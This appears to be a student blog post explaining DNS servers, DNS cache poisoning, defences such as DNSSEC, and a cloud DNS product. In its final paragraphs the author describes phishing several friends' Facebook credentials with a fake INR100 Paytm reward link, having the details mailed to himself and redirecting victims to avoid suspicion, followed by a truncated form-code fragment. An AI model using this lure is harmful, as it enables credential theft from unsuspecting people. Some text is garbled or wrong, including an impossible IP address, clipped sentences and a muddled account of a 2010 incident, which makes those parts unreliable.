What is DNS Server?
A DNS server
is a computer server that contains a database of public IP addresses and their associated hostnames, and in most cases, serves to resolve, or translate, those common
names to IP addresses as requested.
DNS servers run
special software and communicate with each other using special protocols.
In simple context: A
DNS server is a medium or channel that translates or converts the address (www.skillrack.com)
you type in search bar to IP address (192.252.346.102) that it actually is which
is understandable by the computer.
According to me DNS
servers play an important role as a translator between hostname and IP address
because we cannot use or remember all these IP addresses to get access to any
website and this DNS server simply converts our human readable name address to
its corresponding computer readable IP address.
What is DNS Cache Poisoning?
cache poisoning, also known as DNS spoofing, is a type of attack that exploits
vulnerabilities in the domain name system (DNS) to divert Internet traffic away
from legitimate servers and towards fake ones.
of the reasons DNS poisoning is so dangerous is because it can spread from DNS
server to DNS server. In 2010, a DNS poisoning event resulted in the Great
Firewall of China temporarily escaping China’s national borders, censoring the
Internet in the USA until the problem was fixed.
to my knowledge on the day of some Chinese festival the DNS server of china
which had blocked the U.S. companies’ server like twitter.com and facebook.com got
somehow linked with the DNS server of US and as a result of this mishandling
the people of US suffered as they could not get access to these social media.
if the malware changed your DNS server settings (which can happen behind the
scenes without your knowledge), entering the same URL might take you to a
completely different website, or more importantly, to a website that looks like
your bank website but really isn’t. This fake bank site might look exactly like
the real one but instead of letting you login to your account, it might just
record your username and password, giving the scammers all the information they
need to access your bank account.
malware that hijacks your DNS servers generally just redirects popular websites
to ones that are full of advertisements or fake virus websites that make you
think you have to buy a program to clean an infected computer.
DNS Caching: The Attack:
Internet doesn’t just have a single DNS server, as that would be extremely
inefficient. Your ISP runs its own DNS servers, which cache information from
other DNS servers. Your home router functions as a domain name server, which
caches information from your ISP’s DNS servers. Your computer has a local DNS
cache, so it can quickly refer to DNS lookups it’s already performed rather
than performing a DNS lookup over and over again.
poisoning can also spread in a similar fashion. For example, if various ISPs
are getting their DNS information from the compromised server, the poisoned DNS
entry will spread to the Internet service providers and be cached there. It
will then spread to home routers and the DNS caches on computers as they look
up the DNS entry, receive the incorrect response, and store it. (This is the
case of firewall escaping china and affecting internet in USA)
Things you should do
to avoid becoming a victim.
antivirus program so that malicious programs are caught before they can do any
Be aware of how a
website looks. If it’s slightly off of what it usually looks like or you’re
getting an “invalid certificate” message in your browser, it might be
a sign that you’re on an imitation website.
check whether the site address has ‘https’ and not ‘http’ when providing any
personal information such as username or password.
If the site gets
redirected to any other web page not expected on clicking, immediately close
the tab. This might prevent you from installing any malware to your pc.
are several measures that enterprises should take to prevent DNS cache
poisoning attacks. For starters, IT teams should configure DNS servers to rely
as little as possible on trust relationships with other DNS servers. Doing so
will make it more difficult for attackers to use their own DNS servers to
corrupt their targets’ servers. Beyond limiting trust relationships on the DNS,
IT teams should ensure that they’re using the most recent version of DNS.
Domain Name Systems that use BIND 9.5.0
or higher include features such as port randomization and cryptographically
secure Transaction IDs, both of which help prevent cache poisoning attacks.
The DNS server should be maintained
to ensure that it is clear of any services that aren’t needed. Extraneous services
running on the DNS server only provide attackers with more potential attack
There are also cache poisoning tools
available to help organizations prevent cache poisoning attacks. The most
popular cache poisoning prevention tool is probably DNSSEC (Domain Name System Security Extension). DNSSEC is a cache poisoning tool developed by
the Internet Engineering Task Force that provides secure DNS data
More information on
DNSSEC is a technology that was developed to, among
other things, protect against such attacks by digitally ‘signing’ data so you
can be assured it is valid. However, in order to eliminate the vulnerability
from the Internet, it must be deployed at each step in the lookup from root
zone to final domain name (e.g., www.icann.org). Signing the root
(deploying DNSSEC on the root zone) is a necessary step in this overall
process. Importantly it does not encrypt data. It just
attests to the validity of the address of the site you visit.
DNSSEC works by digitally signing records for DNS
lookup using public-key cryptography. The correct DNSKEY record is
authenticated via a chain of trust, starting with a set of verified public
keys for the DNS root zone which is the trusted third party.
Domain owners generate their own keys, and upload them using their DNS control
panel at their domain-name registrar, which in turn pushes the keys via sec DNS
to the zone operator (e.g., Verisign for .com) who signs and publishes them in
cloud-based DNS management:
CDNetworks offers a managed,
cloud-based, authoritative and global DNS service, which ensures websites can
be reached, efficiently and quickly.
This is a method which
portal with advanced management and control features.
DNS security, protecting against spoofing and cache poisoning.
available thanks to built-in redundancy.
responses across the globe.
intuitive set-up and management.
You can easily acquire such a system to your PC to
remain secure all time whenever browsing for some information on net and get
prevented from dangerous threats which could cause harm to your PC.
Here is an illustration about how the end user can get
easy and quick response from DNS server. This system calculates which is the
shortest path available to reach the user is.
I have created a link through which I was able to acquire
username and password of their Facebook account of several friends by telling
them that if they login via Facebook account they would get free INR100 in
their paytm wallet. Therefore when the user enters his account details the information
of details get into my mail and the user is redirected to paytm website so that
no suspicious is created.
This is the main line of code which governs the process
method=”post” novalidate=”1″ onsubmit=”return window.